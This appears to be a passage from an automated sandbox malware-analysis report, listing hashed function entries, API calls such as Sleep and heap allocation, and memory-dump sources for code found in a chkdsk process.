                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0200FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: true
                                  • Associated: 0000000A.00000002.849798315.0000000001FF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.00000000020F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000A.00000002.849798315.0000000002160000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1ff0000_chkdsk.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000D9040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 251 d9040-d906f 252 d907b-d9082 251->252 253 d9076 call dbd00 251->253 254 d915c-d9162 252->254 255 d9088-d90d8 call dbdd0 call cace0 call d4e40 252->255 253->252 262 d90e0-d90f1 Sleep 255->262 263 d9156-d915a 262->263 264 d90f3-d90f9 262->264 263->254 263->262 265 d90fb-d9121 call d8c60 264->265 266 d9123-d9143 264->266 268 d9149-d914c 265->268 266->268 269 d9144 call d8e70 266->269 268->263 269->268
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 000D90E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: efb03857d52d6573277e5425356831fb8c5fd27b1abb42dbcb8a01064d596ca9
                                  • Instruction ID: 96a1085880f92e5a4133b1ce2fb5a97274aa2e7cffd2d0ec0ba0e2ae8fe13e11
                                  • Opcode Fuzzy Hash: efb03857d52d6573277e5425356831fb8c5fd27b1abb42dbcb8a01064d596ca9
                                  • Instruction Fuzzy Hash: 2B3172B6500745BBC724DF64D885FA7B7F8BB48B00F10841EF62A5B345D670A550CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000D903A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 271 d903a-d9082 call dbd00 274 d915c-d9162 271->274 275 d9088-d90d8 call dbdd0 call cace0 call d4e40 271->275 282 d90e0-d90f1 Sleep 275->282 283 d9156-d915a 282->283 284 d90f3-d90f9 282->284 283->274 283->282 285 d90fb-d9121 call d8c60 284->285 286 d9123-d9143 284->286 288 d9149-d914c 285->288 286->288 289 d9144 call d8e70 286->289 288->283 289->288
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 000D90E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: dc74945a2ada0337e6cd2ccdab7bd8f058fa11bf438347138828b11928dedcc1
                                  • Instruction ID: 7c05aa360f6356e3ed3a6565378cfc3c256b96ef048943ffbbfec1e091583667
                                  • Opcode Fuzzy Hash: dc74945a2ada0337e6cd2ccdab7bd8f058fa11bf438347138828b11928dedcc1
                                  • Instruction Fuzzy Hash: C721A0B5600345ABCB64DF64C886FABBBF4BB48700F10802EF6296B345D674A554CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 da5f0-da621 call daf20 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(&E,?,000D4C9F,000D4C9F,?,000D4526,?,?,?,?,?,00000000,00000000,?), ref: 000DA61D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &E
                                  • API String ID: 1279760036-809379005
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: da22c280ce080b69c616058010e085087ab267f391ff398020945c26d950f037
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: D3E012B2200208ABDB14EF99DC41EA777ACEF88654F118599BA089B242C630F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000DA623 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 300 da623-da647 call daf20 302 da64c-da661 RtlFreeHeap 300->302
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA65D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_c0000_chkdsk.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: b44c1acee337ea0c686e99c1270b2a65a8297b02c87cd28efe42a10116497b9e
                                  • Instruction ID: d626d3040b71baf946f899b6ec9bead0253b74d683594578d16b89413c72997d
